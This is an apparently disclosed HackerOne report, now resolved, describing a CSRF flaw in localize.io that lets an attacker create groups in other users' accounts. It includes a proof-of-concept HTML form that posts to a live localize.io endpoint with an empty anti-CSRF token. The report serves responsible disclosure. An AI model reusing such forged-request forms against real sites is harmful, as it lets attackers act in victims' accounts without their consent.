Group Creation Via CSRF

Disclosed: 2014-04-21 02:45:56 By ajaysinghnegi To localize
Unknown
Vulnerability Details
Hi Team, I have found a CSRf vulnerability using which the attacker can create a group on any users account as the anti-csrf token is not getting vlaidated on the server-side. Group Creation Via CSRF Code: <html> <body> <form action="http://www.localize.io/pages/create_project/9k" method="POST"> <input type="hidden" name="CSRFToken" value="" /> <input type="hidden" name="addGroup[name]" value="test" /> <input type="submit" value="Submit form" /> </form> </body> </html>
Actions
View on HackerOne
Report Stats
  • Report ID: 8216
  • State: Closed
  • Substate: resolved
  • Upvotes: 2
Share this report